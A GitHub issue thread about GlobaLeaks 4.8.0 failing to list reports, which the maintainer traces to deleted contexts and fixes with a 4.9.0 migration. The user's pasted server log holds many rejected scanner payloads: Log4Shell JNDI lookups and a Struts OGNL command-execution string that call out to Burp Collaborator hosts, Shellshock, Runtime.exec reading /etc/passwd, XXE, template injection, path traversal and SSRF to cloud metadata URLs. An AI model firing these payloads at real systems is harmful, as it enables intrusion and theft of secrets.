### ISSUE TITLE
Cannot see list of reportings 

### ISSUE THREAD

**Issue by schris-dk** [globaleaks/GlobaLeaks#3209]
After updating ot 4.8.0 we have encountered an issue with one of our test sites. Suddely we cannot see the list of reportings. Even when trying to create new reportings, nothing is seen. We receive error messages like below:

Platform: demotest-qbdo
Host: FQDN (xxx.onion)
Version: 4.8.0

URL: /recipient/reports

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36

Error Message: TypeError: Cannot read properties of undefined (reading 'name')

Stacktrace:
[
  {
    "columnNumber": 615202,
    "lineNumber": 64,
    "fileName": "https://FQDN/js/scripts.min.js",
    "source": "    at https://FQDN/js/scripts.min.js:64:615202"
  },
  {
    "columnNumber": 1541,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "functionName": "Object.x [as forEach]",
    "source": "    at Object.x [as forEach] (https://FQDN/js/scripts.min.js:8:1541)"
  },
  {
    "columnNumber": 615091,
    "lineNumber": 64,
    "fileName": "https://FQDN/js/scripts.min.js",
    "functionName": "new <anonymous>",
    "source": "    at new <anonymous> (https://FQDN/js/scripts.min.js:64:615091)"
  },
  {
    "columnNumber": 26539,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "functionName": "Object.instantiate",
    "source": "    at Object.instantiate (https://FQDN/js/scripts.min.js:8:26539)"
  },
  {
    "columnNumber": 60585,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "source": "    at https://FQDN/js/scripts.min.js:8:60585"
  },
  {
    "columnNumber": 5238,
    "lineNumber": 33,
    "fileName": "https://FQDN/js/scripts.min.js",
    "functionName": "Object.link",
    "source": "    at Object.link (https://FQDN/js/scripts.min.js:33:5238)"
  },
  {
    "columnNumber": 7410,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "source": "    at https://FQDN/js/scripts.min.js:8:7410"
  },
  {
    "columnNumber": 57271,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "functionName": "Ue",
    "source": "    at Ue (https://FQDN/js/scripts.min.js:8:57271)"
  },
  {
    "columnNumber": 52061,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "functionName": "re",
    "source": "    at re (https://FQDN/js/scripts.min.js:8:52061)"
  },
  {
    "columnNumber": 44918,
    "lineNumber": 8,
    "fileName": "https://FQDN/js/scripts.min.js",
    "source": "    at https://FQDN/js/scripts.min.js:8:44918"
  }
]

Last section of Globaleaks.log:

2022-03-21 13:56:37+0000 [-] [E] -- Invalid python_type, in [${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"timeout","11"})).start()).getInputStream()))).readLine()}${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"sleep","11"})).start()).getInputStream()))).readLine()}] expected <class 'int'>
2022-03-21 13:56:37+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:37+0000 [-] [E] -- Invalid python_type, in [() { _; } >_[$($())] { /bin/sleep 11; }] expected <class 'int'>
2022-03-21 13:56:37+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:37+0000 [-] [E] -- Invalid python_type, in [%{7255*5352}] expected <class 'int'>
2022-03-21 13:56:37+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:38+0000 [-] [E] -- Invalid python_type, in [9420*3995] expected <class 'int'>
2022-03-21 13:56:38+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:38+0000 [-] [E] -- Invalid python_type, in [${9008*9121}] expected <class 'int'>
2022-03-21 13:56:38+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:38+0000 [-] [E] -- Invalid python_type, in [syki''wemv] expected <class 'int'>
2022-03-21 13:56:38+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:38+0000 [-] [E] -- Invalid python_type, in [@(3371*8935)] expected <class 'int'>
2022-03-21 13:56:38+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:38+0000 [-] [E] -- Invalid python_type, in [a'a\\'b"c>?>%}}%%>c<[[?${{%}}cake\\] expected <class 'int'>
2022-03-21 13:56:38+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:39+0000 [-] [E] -- Invalid python_type, in [e9lxt2m2yya9] expected <class 'int'>
2022-03-21 13:56:39+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:39+0000 [-] [E] -- Invalid python_type, in [{!xmlparser v='<!DOCTYPE a SYSTEM "http://i4n9ku6osm3jrtef0pw0d6bjdaj07p.burpcollaborator.net/xxe"><a></a>'}] expected <class 'int'>
2022-03-21 13:56:39+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:39+0000 [-] [E] -- Invalid python_type, in [%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping wff3m33guj3yu7f0ls16zdnpngt6hv.burpcollaborator.net -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}] expected <class 'int'>
2022-03-21 13:56:39+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:39+0000 [-] [E] -- Invalid python_type, in [401$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d] expected <class 'int'>
2022-03-21 13:56:39+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:40+0000 [-] [E] -- Invalid python_type, in [401&zq=x%3c%61%60%27%22%24%7b%7b%5c] expected <class 'int'>
2022-03-21 13:56:40+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:40+0000 [-] [E] -- Invalid python_type, in [401|zq=%3c%61%60%27%22%24%7b%7b%5c] expected <class 'int'>
2022-03-21 13:56:40+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:40+0000 [-] [E] -- Invalid python_type, in [401&zq=%3c%61%60%27%22%24%7b%7b%5c] expected <class 'int'>
2022-03-21 13:56:40+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:40+0000 [-] [E] -- Invalid python_type, in [pf6a7771`z'z"${{%{{\\] expected <class 'int'>
2022-03-21 13:56:40+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:41+0000 [-] [E] -- Invalid python_type, in [xkogultt920\\z`z'z"${{%{{\\] expected <class 'int'>
2022-03-21 13:56:41+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:41+0000 [-] [E] -- Invalid python_type, in [z7del7r5] expected <class 'int'>
2022-03-21 13:56:41+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:41+0000 [-] [E] -- Invalid python_type, in [401/0] expected <class 'int'>
2022-03-21 13:56:41+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:41+0000 [-] [E] -- Invalid python_type, in [401-0] expected <class 'int'>
2022-03-21 13:56:41+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:41+0000 [-] [E] -- Invalid python_type, in [401/00] expected <class 'int'>
2022-03-21 13:56:41+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:41+0000 [-] [E] -- Invalid python_type, in [401/01] expected <class 'int'>
2022-03-21 13:56:41+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:42+0000 [-] [E] -- Invalid python_type, in [401/'z*/**/] expected <class 'int'>
2022-03-21 13:56:42+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:42+0000 [-] [E] -- Invalid python_type, in [401/**z'*/] expected <class 'int'>
2022-03-21 13:56:42+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:43+0000 [-] [E] -- Invalid python_type, in [401/*/*/z'*/] expected <class 'int'>
2022-03-21 13:56:43+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:43+0000 [-] [E] -- Invalid python_type, in [401/*//z'//*/] expected <class 'int'>
2022-03-21 13:56:43+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:43+0000 [-] [E] -- Invalid python_type, in [401,abz(1)] expected <class 'int'>
2022-03-21 13:56:43+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:43+0000 [-] [E] -- Invalid python_type, in [401,abs(1)] expected <class 'int'>
2022-03-21 13:56:43+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:43+0000 [-] [E] -- Invalid python_type, in [401,abs(0,1)] expected <class 'int'>
2022-03-21 13:56:43+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:44+0000 [-] [E] -- Invalid python_type, in [401,abs(01)] expected <class 'int'>
2022-03-21 13:56:44+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:44+0000 [-] [E] -- Invalid python_type, in [.../....///.../....///.../....///.../....///.../....///.../....///etc/passwd] expected <class 'int'>
2022-03-21 13:56:44+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:44+0000 [-] [E] -- Invalid python_type, in [.../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd] expected <class 'int'>
2022-03-21 13:56:44+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:44+0000 [-] [E] -- Invalid python_type, in [../../../../../../../../../../../../../../../../etc/passwd%00.html] expected <class 'int'>
2022-03-21 13:56:44+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:44+0000 [-] [E] -- Invalid python_type, in [file:///c:/windows/win.ini] expected <class 'int'>
2022-03-21 13:56:44+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:45+0000 [-] [E] -- Invalid python_type, in [file:///etc/passwd] expected <class 'int'>
2022-03-21 13:56:45+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:45+0000 [-] [E] -- Invalid python_type, in [file://\\/\\/etc/passwd] expected <class 'int'>
2022-03-21 13:56:45+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:45+0000 [-] [E] -- Invalid python_type, in [%2fetc%2fpasswd] expected <class 'int'>
2022-03-21 13:56:45+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:45+0000 [-] [E] -- Invalid python_type, in [../../../../../../../../../../../../../../../../windows/win.ini] expected <class 'int'>
2022-03-21 13:56:45+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:45+0000 [-] [E] -- Invalid python_type, in [../../../../../../../../../../../../../../../../windows/win.ini%00.html] expected <class 'int'>
2022-03-21 13:56:45+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:46+0000 [-] [E] -- Invalid python_type, in [#{applicationScope}] expected <class 'int'>
2022-03-21 13:56:46+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:46+0000 [-] [E] -- Invalid python_type, in [{{664*764}}] expected <class 'int'>
2022-03-21 13:56:46+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:46+0000 [-] [E] -- Invalid python_type, in [${664*764}] expected <class 'int'>
2022-03-21 13:56:46+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:46+0000 [-] [E] -- Invalid python_type, in [${applicationScope}] expected <class 'int'>
2022-03-21 13:56:46+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:46+0000 [-] [E] -- Invalid python_type, in [#{664*764}] expected <class 'int'>
2022-03-21 13:56:46+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:47+0000 [-] [E] -- Invalid python_type, in [(new+java.util.Scanner((T(java.lang.Runtime).getRuntime().exec("cat+/etc/passwd").getInputStream()),"UTF-8")).useDelimiter("\\\\A").next()] expected <class 'int'>
2022-03-21 13:56:47+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:47+0000 [-] [E] -- Invalid python_type, in [<$fileName="../../../../../../../../../../../etc/passwd"$><$executeService("GET_LOGGED_SERVER_OUTPUT")$><$ServerOutput$>] expected <class 'int'>
2022-03-21 13:56:47+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:47+0000 [-] [E] -- Invalid python_type, in [{!xmlparser v='<!DOCTYPE a SYSTEM "http://yprh3ri0od5g26z8kebjz5d07rdh16.burpcollaborator.net/xxe"><a></a>'}] expected <class 'int'>
2022-03-21 13:56:47+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:47+0000 [-] [E] -- Invalid python_type, in [../../../../WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:47+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:48+0000 [-] [E] -- Invalid python_type, in [../../../WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:48+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:48+0000 [-] [E] -- Invalid python_type, in [../../WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:48+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:48+0000 [-] [E] -- Invalid python_type, in [../WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:48+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:48+0000 [-] [E] -- Invalid python_type, in [%c0%ae/WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:48+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:48+0000 [-] [E] -- Invalid python_type, in [%c0%ae/%c0%ae/WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:48+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:49+0000 [-] [E] -- Invalid python_type, in [%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:49+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:49+0000 [-] [E] -- Invalid python_type, in [%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:49+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:49+0000 [-] [E] -- Invalid python_type, in [../../../WEB-INF/web.xml;x=] expected <class 'int'>
2022-03-21 13:56:49+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:49+0000 [-] [E] -- Invalid python_type, in [../../WEB-INF/web.xml;x=] expected <class 'int'>
2022-03-21 13:56:49+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:50+0000 [-] [E] -- Invalid python_type, in [../WEB-INF/web.xml;x=] expected <class 'int'>
2022-03-21 13:56:50+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:50+0000 [-] [E] -- Invalid python_type, in [WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:50+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:50+0000 [-] [E] -- Invalid python_type, in [.//WEB-INF/web.xml] expected <class 'int'>
2022-03-21 13:56:50+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:50+0000 [-] [D] Key answer expected but missing!
2022-03-21 13:56:50+0000 [-] [D] Received schema dict_keys([]) - Expected dict_keys(['answer'])
2022-03-21 13:56:51+0000 [-] [D] Key answer expected but missing!
2022-03-21 13:56:51+0000 [-] [D] Received schema dict_keys([]) - Expected dict_keys(['answer'])
2022-03-21 13:56:51+0000 [-] [D] Key answer expected but missing!
2022-03-21 13:56:51+0000 [-] [D] Received schema dict_keys([]) - Expected dict_keys(['answer'])
2022-03-21 13:56:52+0000 [-] [D] Key answer expected but missing!
2022-03-21 13:56:52+0000 [-] [D] Received schema dict_keys([]) - Expected dict_keys(['answer'])
2022-03-21 13:56:52+0000 [-] [E] -- Invalid python_type, in [fetch('https://7ltxamwm6kbk34mice5sj8skmbs1gq.burpcollaborator.net')] expected <class 'int'>
2022-03-21 13:56:52+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:53+0000 [-] [E] -- Invalid python_type, in [gopher://localhost:22/] expected <class 'int'>
2022-03-21 13:56:53+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:53+0000 [-] [E] -- Invalid python_type, in [http://[::]:22/] expected <class 'int'>
2022-03-21 13:56:53+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:53+0000 [-] [E] -- Invalid python_type, in [ftp://[::]:22/] expected <class 'int'>
2022-03-21 13:56:53+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:53+0000 [-] [E] -- Invalid python_type, in [ftp://localhost:22/] expected <class 'int'>
2022-03-21 13:56:53+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:53+0000 [-] [E] -- Invalid python_type, in [ftp://0.0.0.0:22/] expected <class 'int'>
2022-03-21 13:56:53+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:53+0000 [-] [E] -- Invalid python_type, in [ftp://0177.0000.0000.0001:22] expected <class 'int'>
2022-03-21 13:56:53+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:54+0000 [-] [E] -- Invalid python_type, in [ftp://0x7f.1:22/] expected <class 'int'>
2022-03-21 13:56:54+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:54+0000 [-] [E] -- Invalid python_type, in [http://spoofed.burpcollaborator.net:22/] expected <class 'int'>
2022-03-21 13:56:54+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:54+0000 [-] [E] -- Invalid python_type, in [http://169.254.169.254/latest/meta-data/] expected <class 'int'>
2022-03-21 13:56:54+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:54+0000 [-] [E] -- Invalid python_type, in [http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token] expected <class 'int'>
2022-03-21 13:56:54+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:54+0000 [-] [E] -- Invalid python_type, in [%E5%98%8A%E5%98%8DX-Injection:%20test] expected <class 'int'>
2022-03-21 13:56:54+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:55+0000 [-] [D] Key answer expected but missing!
2022-03-21 13:56:55+0000 [-] [D] Received schema dict_keys([]) - Expected dict_keys(['answer'])
2022-03-21 13:56:56+0000 [-] [E] -- Invalid python_type, in [System.getProperties()] expected <class 'int'>
2022-03-21 13:56:56+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:56+0000 [-] [E] -- Invalid python_type, in [${jndi:ldap://q.165jtp73o0crordd864hkailpcv4z8nx.burpcollaborator.net:99999/s2test}] expected <class 'int'>
2022-03-21 13:56:56+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:56+0000 [-] [E] -- Invalid python_type, in [${jndi:ldap://h${hostName}.lmb399nn4ksb4btxoqk10uy55wboft3i.burpcollaborator.net:99999/s2test}] expected <class 'int'>
2022-03-21 13:56:56+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:57+0000 [-] [E] -- Invalid python_type, in [${jndi:ldap://u${hostName}-s2u-${env:USERNAME:-${env:USER}}.zz2hmn01hy5php6b14xfd8bjiao2tshh.burpcollaborator.net:99999/s2test}] expected <class 'int'>
2022-03-21 13:56:57+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:57+0000 [-] [E] -- Invalid python_type, in [O:3:"PDO":0:{}] expected <class 'int'>
2022-03-21 13:56:57+0000 [-] [E] Received key answer: type validation fail
2022-03-21 13:56:58+0000 [-] [E] -- Invalid python_type, in [TzozOiJQRE8iOjA6e30=] expected <class 'int'>
2022-03-21 13:56:58+0000 [-] [E] Received key answer: type validation fail
2022-03-21 14:00:00+0000 [-] [D] Fetching list of Tor exit nodes
2022-03-21 14:00:00+0000 [-] Starting factory _HTTP11ClientFactory(<function HTTPConnectionPool._newConnection.<locals>.quiescentCallback at 0x7fe2ecdf9ea0>, <twisted.internet.endpoints._WrapperEndpoint object at 0x7fe2ec711d30>)
2022-03-21 14:00:02+0000 [-] [D] Retrieved a list of 1376 exit nodes
2022-03-21 14:00:02+0000 [-] Stopping factory _HTTP11ClientFactory(<function HTTPConnectionPool._newConnection.<locals>.quiescentCallback at 0x7fe2ecdf9ea0>, <twisted.internet.endpoints._WrapperEndpoint object at 0x7fe2ec711d30>)
2022-03-21 14:00:46+0000 [-] [D] Received client exception and passed error to exception mail handler
2022-03-21 14:00:50+0000 [-] [D] [1] Sending email to ZZZ@bdo.dk using SMTP server [mail.globaleaks.org:587] [TLS]
2022-03-21 14:00:50+0000 [-] Starting factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2eccd86d8>
2022-03-21 14:00:50+0000 [-] Stopping factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2eccd86d8>
2022-03-21 14:00:51+0000 [-] [D] [1] Sending email to YYY@bdo.dk using SMTP server [mail.globaleaks.org:587] [TLS]
2022-03-21 14:00:51+0000 [-] Starting factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2ed560a20>
2022-03-21 14:00:52+0000 [-] Stopping factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2ed560a20>
2022-03-21 14:00:53+0000 [-] [D] [1] Sending email to YYY@bdo.dk using SMTP server [mail.globaleaks.org:587] [TLS]
2022-03-21 14:00:53+0000 [-] Starting factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2eddf9550>
2022-03-21 14:00:53+0000 [-] Stopping factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2eddf9550>
2022-03-21 14:00:54+0000 [-] [D] [1] Sending email to ZZZ@bdo.dk using SMTP server [mail.globaleaks.org:587] [TLS]
2022-03-21 14:00:54+0000 [-] Starting factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2fd227470>
2022-03-21 14:00:55+0000 [-] Stopping factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2fd227470>
2022-03-21 14:00:56+0000 [-] [D] [1] Sending email to XXX@bdo.dk using SMTP server [mail.globaleaks.org:587] [TLS]
2022-03-21 14:00:56+0000 [-] Starting factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2edf71588>
2022-03-21 14:00:56+0000 [-] Stopping factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2edf71588>
2022-03-21 14:00:57+0000 [-] [D] [1] Sending email to XXX@gmail.com using SMTP server [mail.globaleaks.org:587] [TLS]
2022-03-21 14:00:57+0000 [-] Starting factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2eca35390>
2022-03-21 14:00:58+0000 [-] Stopping factory <twisted.mail.smtp.ESMTPSenderFactory object at 0x7fe2eca35390>
2022-03-21 14:03:36+0000 [-] [E] -- Invalid python_type, in [fexzrhp9kwizd1k9d4tb5pv12s8owokgc44rxfm] expected <class 'int'>
2022-03-21 14:03:36+0000 [-] [E] Received key answer: type validation fail

Any ideas?

**Comment by evilaliv3** [comment]
Thank you @schris-dk, at the moment from the logs and the error you provider i'm not able to clearly identify the case.

I will try to keep an eye on this.

**Comment by schris-dk** [comment]
How do we get around it? How would we recover and see the reports that are present in the tennant?

Br

Søren

Fra: Giovanni Pellerano ***@***.***>
Sendt: 21. marts 2022 18:02
Til: globaleaks/GlobaLeaks ***@***.***>
Cc: Søren Christensen ***@***.***>; Mention ***@***.***>
Emne: Re: [globaleaks/GlobaLeaks] Cannot see list of reportings (Issue #3209)


Thank you @schris-dk<https://github.com/schris-dk>, at the moment from the logs and the error you provider i'm not able to clearly identify the case.

I will try to keep an eye on this.

**Comment by evilaliv3** [comment]
Thank you @schris-dk 

In you for your question.

In your previous email you told that this bug has been identified on a test site.
If this is the case i would invite you to wait to update to the current version till we will be able to identify better the reason of the failure.

At the moment unfortunately with the few feedback provided and without know anything about your configuration i was actually not able to reproduce it.

**Comment by evilaliv3** [comment]
@schris-dk: I suspect you may have deleted a context and this has lead your setup in an inconsistent state because it misses information for showing the submissions correctly.

**Comment by evilaliv3** [comment]
Fixed

Withe releae 4.9.0 we will as a migration script able to fix previous setups where this issue happened by connecting submissions with deleted contexts to an existing contex; This wont be perfect but at least would make the platform work.

**Comment by evariitta** [comment]
I ran to this issue at our test site. We updated test site to 4.9.0 and I tested this among everything else.

I created two questionnaires and had two contexts.

I submitted a report at both of the contexts. Then I first disabled and then deleted the second context. 

After this, the recipients view to reports was quite odd and there wasn't any reports to be seen, not even the one at a context I hadn't deleted. We also received error messages every time I went to see the reports as a recipient.

"
Error Message: TypeError: Cannot read properties of undefined (reading 'name')
"

I thought to report this as this was one of the updates with the version 4.9.0. "Fix visibility of reports related to deleted contexts (#3209)"

I can send more information if needed.

**Comment by evilaliv3** [comment]
@evariitta : If you delete the context you delete a large set of information related to the existing reports that on that context where submitted.

This is already clarified by the software in the confirmation about the context deletion.

The reason why the client show no reports is that runs in a failure and cannot proceed any futher.

Update 4.9.0 cannot re-build that information but was expected to try to solve partially the issue attaching orphan reports to an existing context.

Please let me know if you have any question or doubt.
